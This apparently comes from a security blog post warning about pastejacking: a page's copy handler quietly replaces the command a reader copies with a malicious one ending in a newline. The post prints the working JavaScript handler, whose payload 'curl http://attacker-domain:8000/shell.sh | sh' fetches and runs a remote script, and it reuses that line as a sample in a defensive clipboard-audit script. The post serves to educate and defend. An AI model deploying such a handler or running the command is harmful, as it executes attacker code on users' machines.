Get Hacked By Accidentally Copy Pasting
This is why you should NEVER copy and paste commands directly into your terminal. Ask any developer or admin whether they have ever copied a command line or code snippet from the web, and the answer will probably be YES. You would assume that what you copied is what you paste, right? Well, nope!
You think you are copying one thing, but it’s replaced with something else, like malicious code. All it takes is a single line of code injected into the code you copied to create a backdoor to your app.
This attack is very simple but also very harmful. Here is how it works:
Let’s say you were searching for how to update Ubuntu and you found this command line, so you copy it:
Try it — copy the command below:
sudo apt update
Now paste it here:
Here is the issue: did you see that it automatically added a new line? When this happens in a terminal, the command is executed automatically!
This is the JavaScript that is responsible for this:
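<script>
document.getElementById('copy').addEventListener('copy', function (e) {
  // Overwrite the clipboard; the trailing \n makes a terminal run the line on paste.
  e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n');
  e.preventDefault(); // stop the browser from copying the text the user selected
});
</script>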
How to avoid this?
The safest way is not to paste anything you copied from the web into your terminal. Also, many terminals can be configured not to execute automatically when you paste a “\n” (new line).
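A way to see what is really on the clipboard before it goes near a shell, as an added example that is not part of the original post. The function names `render` and `auditPaste` are made up for this illustration, and the sample strings are constructed from the demo above.

```javascript
// Added example: audit clipboard text before pasting it into a terminal.
// render() and auditPaste() are hypothetical helper names, not a real API.

// Make control characters visible so a hidden newline or escape shows up as text.
function render(text) {
  return text.replace(/[\x00-\x1f\x7f]/g, (c) => {
    if (c === '\n') return '\\n';
    if (c === '\r') return '\\r';
    if (c === '\t') return '\\t';
    return '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0');
  });
}

// expected: the text you selected on the page (pass null if unknown).
// clipboard: the text the clipboard actually holds.
function auditPaste(expected, clipboard) {
  const findings = [];
  if (expected !== null && clipboard !== expected) {
    findings.push('clipboard differs from the text you selected');
  }
  if (/[\r\n]/.test(clipboard)) {
    findings.push('contains a line break: a shell runs the line as soon as it is pasted');
  }
  // Other control bytes (ESC, backspace, ...) have no place in a one-line command.
  if (/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(clipboard)) {
    findings.push('contains control characters');
  }
  return { ok: findings.length === 0, findings, shown: render(clipboard) };
}

// Constructed sample: what the page displayed vs. what its copy handler stored.
const selected = 'sudo apt update';
const hijacked = 'curl http://attacker-domain:8000/shell.sh | sh\n';

const report = auditPaste(selected, hijacked);
console.log(report.ok ? 'clean' : 'DO NOT PASTE');
console.log('clipboard holds: ' + report.shown);
report.findings.forEach((f) => console.log('  ! ' + f));
```

Pasting into a plain text editor first achieves the same inspection by hand: the swapped command and its trailing line break are both visible there.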